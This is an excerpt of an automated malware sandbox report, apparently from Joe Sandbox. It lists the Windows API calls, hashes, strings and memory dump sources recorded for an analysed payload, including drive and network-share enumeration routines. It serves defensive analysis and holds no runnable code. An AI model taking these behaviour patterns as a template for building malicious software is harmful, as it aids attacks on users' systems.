                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: 771730509dab14411627b2967e7a35b96953d9b44e56ee823530ca3a120ddf96
                                                                                                  • Instruction ID: 58a842e775ee42d50a2dbf0779a3cf5e6dbf3987139a3b6faa07852d65f43562
                                                                                                  • Opcode Fuzzy Hash: 771730509dab14411627b2967e7a35b96953d9b44e56ee823530ca3a120ddf96
                                                                                                  • Instruction Fuzzy Hash: F8110AB2A8122433DD30756A6C87FEB7B5C9B42725F0000BBFE0C93242E56A995542E5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0048BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0048BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 0048BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: b21cb6a465a005b1a5acaf46fb132b5feb153110e6b7651a88e60f0277b0afef
                                                                                                  • Instruction ID: 7636b9d801a53305cdcd2d45398ed29b5673c7b110df190457598cd890aa85d0
                                                                                                  • Opcode Fuzzy Hash: b21cb6a465a005b1a5acaf46fb132b5feb153110e6b7651a88e60f0277b0afef
                                                                                                  • Instruction Fuzzy Hash: 14E01A3168172076E33157147C0AF9A2914E711F10F208409FA01793D086E5A945AB8C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00480C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00480C39
                                                                                                  • _memset.LIBCMT ref: 00480C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00480C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: 66af80dfd7556d4b1112534ab24f33b4662a236c1e372c41bc75e4adc6db9565
                                                                                                  • Instruction ID: 17b9be6439c778431c977451562c0c483f8befa1fd78009482e048c737ba6902
                                                                                                  • Opcode Fuzzy Hash: 66af80dfd7556d4b1112534ab24f33b4662a236c1e372c41bc75e4adc6db9565
                                                                                                  • Instruction Fuzzy Hash: C2919B756183418FD768EF68C851B6FB7E1FF84704F148D1EE48A87380D778A9488B5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004B1726
                                                                                                  • _strlen.LIBCMT ref: 004B1734
                                                                                                    • Part of subcall function 00495208: __getptd_noexit.LIBCMT ref: 00495208
                                                                                                  • _strnlen.LIBCMT ref: 004B17BF
                                                                                                  • __lock.LIBCMT ref: 004B17D0
                                                                                                  • __getenv_helper_nolock.LIBCMT ref: 004B17DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2168648987-0
                                                                                                  • Opcode ID: 08251fb6d2c2ba729b047c9f5c01c816e4b35af0a4abaa8db7717086334ef7da
                                                                                                  • Instruction ID: 2198fdf7f6cb1b7e3041c0d6e4aa61aa963a00a6e99e9a6b26c2b0763f602b63
                                                                                                  • Opcode Fuzzy Hash: 08251fb6d2c2ba729b047c9f5c01c816e4b35af0a4abaa8db7717086334ef7da
                                                                                                  • Instruction Fuzzy Hash: 2B312632941215ABDF216BB9CC51BEF3B94AF01B24F60006BF814DB291DE7C880147BD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00480A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00570234,00000002), ref: 00480AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00480AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00480B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00480B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  • Opcode ID: f2afcd64f96856e0672b14fe5d8b08d05f05a867c844bcd6793a876c0a44ee50
                                                                                                  • Instruction ID: 89edb86d606c4510172da3aa406295a7654e810768042f194cb9acf1f434f49d
                                                                                                  • Opcode Fuzzy Hash: f2afcd64f96856e0672b14fe5d8b08d05f05a867c844bcd6793a876c0a44ee50
                                                                                                  • Instruction Fuzzy Hash: 5C41BE711083409FC710EFA8C895B1FBBE4BB95718F500E2EF485A22A2D7B9D548CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 004AB70B
                                                                                                    • Part of subcall function 00490C62: __FF_MSGBANNER.LIBCMT ref: 00490C79
                                                                                                    • Part of subcall function 00490C62: __NMSG_WRITE.LIBCMT ref: 00490C80
                                                                                                    • Part of subcall function 00490C62: RtlAllocateHeap.NTDLL(00890000,00000000,00000001,?,?,?,?,00493B69,?), ref: 00490CA5
                                                                                                  • _free.LIBCMT ref: 004AB71E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1020059152-0
                                                                                                  • Opcode ID: 4f5f9d6d3f95437b0c898ce19de2e155ab323e8767a609d86a16ed664df64d82
                                                                                                  • Instruction ID: f923bcbe9cadef7beb4537052eef355ff25369393a196cc19070e869d351becf
                                                                                                  • Opcode Fuzzy Hash: 4f5f9d6d3f95437b0c898ce19de2e155ab323e8767a609d86a16ed664df64d82
                                                                                                  • Instruction Fuzzy Hash: AF11E736405615AFCF213BB1AC44A6E3F84EF66364F20013BF844AA252DB7C88409BDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0048F085
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048F0AC
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048F0B6
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048F0C4
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0048F0D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 3f243b0d26e58f5f3ba20213839f2aa98909e6f44cd6d4eaf36903b79790382c
                                                                                                  • Instruction ID: b6469a28ca4085c8056c2aa50c4685685910362859727b88efc7973d37eae72c
                                                                                                  • Opcode Fuzzy Hash: 3f243b0d26e58f5f3ba20213839f2aa98909e6f44cd6d4eaf36903b79790382c
                                                                                                  • Instruction Fuzzy Hash: 3A01DB356403087AE730AB55DC4AF9A3B6CE754B00F504421FE00BB2D1D7B5A50DDBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0048E515
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E53C
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048E546
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048E554
                                                                                                  • WaitForSingleObject.KERNEL32(0000000A), ref: 0048E562
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: 6214c8344354e336e591dc17259fce7100f2cd95ab1d10c5d24ee728677750c0
                                                                                                  • Instruction ID: 19e183a8de9bd92e60d020e316fef7ddceef12d56baec79f6ab43168caaa0402
                                                                                                  • Opcode Fuzzy Hash: 6214c8344354e336e591dc17259fce7100f2cd95ab1d10c5d24ee728677750c0
                                                                                                  • Instruction Fuzzy Hash: CF012B3574030976E7209B91DC46FAA7B6DE754B04F100411FA00BB2D1D6F5A50DD794
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0048FA53
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FA71
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048FA7B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FA89
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0048FA94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction ID: cf70c6f8c64a497a84a4b7b029e593fccace6d0bc8054abda18f81c79f96c2fe
                                                                                                  • Opcode Fuzzy Hash: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction Fuzzy Hash: 9A018631B40309B7EB20AB55DC4AFAB3F6CAB44B10F544461FA04BE2D1D7E5A80997A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0048FE03
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FE21
                                                                                                  • DispatchMessageW.USER32(?), ref: 0048FE2B
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0048FE39
                                                                                                  • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0048FE44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1380987712-0
                                                                                                  • Opcode ID: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction ID: b141627ab45cfb6d68749b0bc855ab6320ae8320df33bb022b6c6fee711a6480
                                                                                                  • Opcode Fuzzy Hash: f52117172c1154f33ac338d0161722e0ee15c9ee9d590aa634cf4ededf0a1b75
                                                                                                  • Instruction Fuzzy Hash: 1A016231A40308A6EB206B959C8AFAB3F6DAB44B01F144461FA00AE2D1D7F5A80997A4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: afbd82155db44570989ef83f2f91ee736f585b98485929a73b5beec026ef3523
                                                                                                  • Instruction ID: a8f658decdf11d94af4796d2016ec87855b46f6ccbac96852890de40adf88064
                                                                                                  • Opcode Fuzzy Hash: afbd82155db44570989ef83f2f91ee736f585b98485929a73b5beec026ef3523
                                                                                                  • Instruction Fuzzy Hash: B751C1317081049BDB24EE1CD99096E7BA6EF85314B348D2EF855CB341D735EC518BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: fafc6ebb31df2da3a1afd923c686787fc4f37b2532068bc018421a6935dc6ceb
                                                                                                  • Instruction ID: de30bbb3f2d6c48986f2a2db32899b984c2423ca4678dcb0641384199605a8e4
                                                                                                  • Opcode Fuzzy Hash: fafc6ebb31df2da3a1afd923c686787fc4f37b2532068bc018421a6935dc6ceb
                                                                                                  • Instruction Fuzzy Hash: 9531F431304205ABDB28FE4CDC8982E77A6EBC17547204E5EF865CB781D739ED418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7M
                                                                                                  • API String ID: 2102423945-4023654100
                                                                                                  • Opcode ID: 1d126440b06c0aa3485298ade1bd764c52ce5dc615011ef11ff83d5273574384
                                                                                                  • Instruction ID: b7baead0845f535126154fdbaedc6886efee2773554295b194577d6e40d46a0f
                                                                                                  • Opcode Fuzzy Hash: 1d126440b06c0aa3485298ade1bd764c52ce5dc615011ef11ff83d5273574384
                                                                                                  • Instruction Fuzzy Hash: 092125B9B442213BE6406668FC92F56B399EB94B18F00402FF609D72C1D2A4AC10C6D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0047C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
